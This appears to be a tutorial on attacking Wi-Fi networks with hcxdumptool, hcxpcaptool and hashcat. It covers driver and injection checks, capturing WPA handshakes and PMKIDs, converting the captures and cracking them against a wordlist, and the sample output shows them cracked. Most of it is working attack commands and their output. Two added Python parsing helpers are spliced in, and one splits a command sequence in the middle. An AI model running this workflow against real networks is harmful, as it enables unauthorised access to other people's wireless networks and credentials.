On the first run, a few steps are needed: identify a suitable interface, check the driver, and check that packet injection is working. You must also identify processes that interfere with hcxdumptool:
Identify interface:
$ hcxdumptool -I
wlan interfaces:
c83a35cb08e3 wlp3s0f0u11u1 (rt2800usb)
If you receive a warning like this:
warning: NetworkManager is running with pid 415
warning: wpa_supplicant is running with pid 515
stop these processes:
$ sudo systemctl stop NetworkManager.service
$ sudo systemctl stop wpa_supplicant.service
Check the driver:
$ sudo hcxdumptool -i wlp3s0f0u11u1 --check_driver
starting driver test...
driver tests passed - all required ioctl() system calls are supported by driver
restoring old driver settings
Check that packet injection is working (run it for at least 13 * 5 seconds):
$ sudo hcxdumptool -i wlp3s0f0u11u1 --do_rcascan
INFO: cha=6, rx=351, rx(dropped)=0, tx=47, err=0, aps=21 (13 in range)
If the values increase and APs are in range, start your attack:
$ hcxdumptool -i wlp3s0f0u11u1 -o test.pcapng --enable_status=1
Otherwise hcxdumptool will inform you that packet injection is possibly not working as expected.
When you have finished and hcxdumptool has terminated, restart the processes:
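To turn the rule of thumb above into a repeatable check, here is an added Python example (not part of hcxdumptool or of this post) that parses a few successive --do_rcascan status lines and reports whether the counters behave as described: rx and tx keep growing, no errors, at least one AP in range. The first sample line is the one shown above; the remaining lines are constructed so the trend check has something to compare.

```python
import re

# Status lines as printed by hcxdumptool --do_rcascan. The first line is the one
# quoted in the post; the following two are constructed samples that continue
# the same counters so the trend check has something to compare.
SAMPLE_STATUS_LINES = [
    "INFO: cha=6, rx=351, rx(dropped)=0, tx=47, err=0, aps=21 (13 in range)",
    "INFO: cha=11, rx=702, rx(dropped)=0, tx=95, err=0, aps=25 (14 in range)",
    "INFO: cha=1, rx=1088, rx(dropped)=0, tx=142, err=0, aps=27 (15 in range)",
]

# Constructed lines for a driver that receives but never transmits: tx stays at 0.
STALLED_TX_LINES = [
    "INFO: cha=6, rx=120, rx(dropped)=0, tx=0, err=0, aps=9 (4 in range)",
    "INFO: cha=11, rx=260, rx(dropped)=0, tx=0, err=0, aps=12 (5 in range)",
    "INFO: cha=1, rx=410, rx(dropped)=0, tx=0, err=0, aps=14 (6 in range)",
]

STATUS_RE = re.compile(
    r"INFO: cha=(?P<cha>\d+), rx=(?P<rx>\d+), rx\(dropped\)=(?P<dropped>\d+), "
    r"tx=(?P<tx>\d+), err=(?P<err>\d+), aps=(?P<aps>\d+) \((?P<in_range>\d+) in range\)"
)


def parse_status(line):
    """Turn one INFO status line into a dict of integer counters."""
    m = STATUS_RE.search(line)
    if m is None:
        raise ValueError(f"not an hcxdumptool status line: {line!r}")
    return {k: int(v) for k, v in m.groupdict().items()}


def check_injection(lines, min_samples=3):
    """Apply the post's rule of thumb to a series of status lines.

    Returns (ok, reasons): ok is True only when rx and tx both keep growing
    between samples, no errors were counted, and at least one AP is in range.
    """
    samples = [parse_status(line) for line in lines]
    reasons = []
    if len(samples) < min_samples:
        reasons.append(f"only {len(samples)} samples, need at least {min_samples}")
        return False, reasons
    pairs = list(zip(samples, samples[1:]))
    if not all(b["rx"] > a["rx"] for a, b in pairs):
        reasons.append("rx counter is not increasing: interface is not receiving in monitor mode")
    if not all(b["tx"] > a["tx"] for a, b in pairs):
        reasons.append("tx counter is not increasing: packet injection is not working")
    if samples[-1]["err"] > 0:
        reasons.append(f"driver reported {samples[-1]['err']} errors")
    if samples[-1]["in_range"] == 0:
        reasons.append("no APs in range, the test is inconclusive")
    return (not reasons), reasons


if __name__ == "__main__":
    for label, lines in (("healthy", SAMPLE_STATUS_LINES), ("stalled tx", STALLED_TX_LINES)):
        ok, reasons = check_injection(lines)
        print(f"{label}: {'OK' if ok else 'PROBLEM'} {reasons}")
```

In practice you would feed the lines from a captured terminal session or a log; the check deliberately requires several samples, because a single status line cannot show whether the counters are moving.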
$ sudo systemctl start NetworkManager.service
$ sudo systemctl start wpa_supplicant.service
If hcxdumptool is not able to set monitor mode, for example on this driver:
https://github.com/aircrack-ng/rtl8188eus
run ip link and iw before you start hcxdumptool:
$ sudo ip link set wlp3s0f0u11u1 down
$ sudo iw dev wlp3s0f0u11u1 set type monitor
$ sudo ip link set wlp3s0f0u11u1 up
$ sudo iw dev wlp3s0f0u11u1 info
BTW:
Most (nearly all) reported issues are related to the driver (the driver does not support monitor mode and full packet injection) or to the system configuration (running services that take control of the interface).
The driver of your device must support both: monitor mode and full packet injection!
Otherwise hcxdumptool will fail!
Some of the issues are fixed:
https://bugzilla.kernel.org/show_bug.cgi?id=202241
https://bugzilla.kernel.org/show_bug.cgi?id=202243
https://github.com/openwrt/mt76/issues/2...-500999516
Some of them are partly fixed (or somebody is working on them):
https://github.com/aircrack-ng/rtl8812au/issues/376
Some of them are not fixed, yet:
https://bugzilla.kernel.org/show_bug.cgi?id=202541
Unfortunately many, many drivers do not support monitor mode and full packet injection. Get more information here:
https://wikidevi.com/wiki/Main_Page
For example, this driver will not support monitor mode:
https://lwn.net/Articles/786478/
Supported:
Basic STA/AP/ADHOC mode, and TDLS (STA is well tested)
So, no monitor mode on rtw88 at this point!
The last step is to convert your pcapng file using hcxpcaptool and run hashcat against the hashes.
Take full advantage of hcxpcaptool (-E -I -U) in combination with hcxdumptool (attack vector PMKID, attack vector AP-LESS, attack vector EAP):
$ hcxpcaptool -o test.hccapx -E wordlist -I wordlist *.pcapng
reading from example1.pcapng
summary capture file:
file name........................: example1.pcapng
file type........................: pcapng 1.0
file os information..............: Linux 4.19.65-1-ARCH
file application information.....: hcxdumptool 5.1.7
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 19.10.2017 15:29:42 (GMT)
maximum time stamp...............: 19.10.2017 15:33:36 (GMT)
packets inside...................: 9
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 0
association requests.............: 3
EAPOL packets (total)............: 5
EAPOL packets (WPA2).............: 5
EAP packets......................: 1
found............................: EAP type ID
best handshakes (total)..........: 1 (ap-less: 0)
summary output file(s):
1 handshake(s) written to test.hccapx
message pair M32E2...............: 1
reading from example2.pcapng
summary capture file:
file name........................: example2.pcapng
file type........................: pcapng 1.0
file hardware information........: armv6l
file os information..............: Linux 4.19.65-1-ARCH
file application information.....: hcxdumptool 5.1.7
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 11.08.2019 17:57:00 (GMT)
maximum time stamp...............: 11.08.2019 17:58:03 (GMT)
packets inside...................: 10
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 0
beacons (total)..................: 2
probe requests...................: 1
association requests.............: 2
association responses............: 1
authentications (OPEN SYSTEM)....: 1
authentications (BROADCOM).......: 1
EAPOL packets (total)............: 3
EAPOL packets (WPA2).............: 3
best handshakes (total)..........: 1 (ap-less: 0)
summary output file(s):
1 handshake(s) written to test.hccapx
message pair M12E2...............: 1
reading from example3.pcapng
summary capture file:
file name........................: example3.pcapng
file type........................: pcapng 1.0
file os information..............: Linux 4.19.65-1-ARCH
file application information.....: hcxdumptool 5.1.7
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 26.05.2017 08:05:46 (GMT)
maximum time stamp...............: 26.05.2017 09:04:13 (GMT)
packets inside...................: 6
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 0
beacons (total)..................: 2
probe responses..................: 2
EAPOL packets (total)............: 2
EAPOL packets (WPA2).............: 2
best handshakes (total)..........: 1 (ap-less: 1)
summary output file(s):
1 handshake(s) written to test.hccapx
message pair M12E2...............: 1
$ hashcat -m 2500 test.hccapx wordlist
hashcat (v5.1.0-1397-g7f4df9eb) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: test.hccapx
Time.Started.....: Mon Aug 26 15:40:07 2019 (1 sec)
Time.Estimated...: Mon Aug 26 15:40:08 2019 (0 secs)
Guess.Base.......: File (wordlist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 613 H/s (3.05ms) @ Accel:16 Loops:512 Thr:64 Vec:1
Recovered........: 3/3 (100.00%) Digests, 3/3 (100.00%) Salts
Progress.........: 54/54 (100.00%)
Rejected.........: 0/54 (0.00%)
Restore.Point....: 0/18 (0.00%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:0-1
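As an added example (not part of hcxpcaptool or of this post), the following Python parses the per-file summary that hcxpcaptool prints, as reproduced above, into one structure per capture file and rolls the results up. That is useful when reviewing a directory of captures from an authorized assessment before converting them: which files contain no usable handshake, which handshake was captured AP-less, and which files carry EAP traffic. The embedded sample is the post's own output for example1 (excerpt, some informational lines omitted) and example3; the "fields", "written" and "message_pairs" names are this example's own.

```python
import re

# hcxpcaptool output as shown in the post for example1 (excerpt) and example3.
SAMPLE_SUMMARY = """\
reading from example1.pcapng
summary capture file:
file name........................: example1.pcapng
file application information.....: hcxdumptool 5.1.7
packets inside...................: 9
association requests.............: 3
EAPOL packets (total)............: 5
EAPOL packets (WPA2).............: 5
EAP packets......................: 1
found............................: EAP type ID
best handshakes (total)..........: 1 (ap-less: 0)
summary output file(s):
1 handshake(s) written to test.hccapx
message pair M32E2...............: 1
reading from example3.pcapng
summary capture file:
file name........................: example3.pcapng
file type........................: pcapng 1.0
file os information..............: Linux 4.19.65-1-ARCH
file application information.....: hcxdumptool 5.1.7
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 26.05.2017 08:05:46 (GMT)
maximum time stamp...............: 26.05.2017 09:04:13 (GMT)
packets inside...................: 6
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 0
beacons (total)..................: 2
probe responses..................: 2
EAPOL packets (total)............: 2
EAPOL packets (WPA2).............: 2
best handshakes (total)..........: 1 (ap-less: 1)
summary output file(s):
1 handshake(s) written to test.hccapx
message pair M12E2...............: 1
"""

# "key.....: value" rows, the handshake total, the "written to" line, message pairs
FIELD_RE = re.compile(r"^(?P<key>.+?)\.{2,}: (?P<value>.+)$")
HANDSHAKE_RE = re.compile(r"^(?P<total>\d+) \(ap-less: (?P<apless>\d+)\)$")
WRITTEN_RE = re.compile(r"^(?P<n>\d+) handshake\(s\) written to (?P<path>\S+)$")
PAIR_RE = re.compile(r"^message pair (?P<pair>M\d+E\d+)$")


def parse_summary(text):
    """Group hcxpcaptool's per-file summary into one dict per capture file."""
    files = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("reading from "):
            current = {"fields": {}, "handshakes": 0, "ap_less": 0,
                       "written": [], "message_pairs": {}}
            files[line[len("reading from "):]] = current
            continue
        if current is None:
            continue
        w = WRITTEN_RE.match(line)
        if w:
            current["written"].append((int(w["n"]), w["path"]))
            continue
        f = FIELD_RE.match(line)
        if f is None:
            continue  # headings such as "summary capture file:"
        key, value = f["key"], f["value"]
        p = PAIR_RE.match(key)
        h = HANDSHAKE_RE.match(value) if key == "best handshakes (total)" else None
        if p:
            current["message_pairs"][p["pair"]] = int(value)
        elif h:
            current["handshakes"], current["ap_less"] = int(h["total"]), int(h["apless"])
        else:
            current["fields"][key] = value
    return files


def audit(files):
    """Roll the per-file results up: totals, EAP-carrying files, files with nothing usable."""
    return {
        "files": len(files),
        "handshakes": sum(f["handshakes"] for f in files.values()),
        "ap_less": sum(f["ap_less"] for f in files.values()),
        "eap_files": sorted(n for n, f in files.items() if "EAP packets" in f["fields"]),
        "no_handshake": sorted(n for n, f in files.items() if f["handshakes"] == 0),
    }
```

Pipe the real tool output into parse_summary (for example by reading it from a saved log) and inspect audit() before deciding which captures are worth converting; files listed under "no_handshake" can be discarded, and "eap_files" is where the -I/-U export options above actually have something to work with.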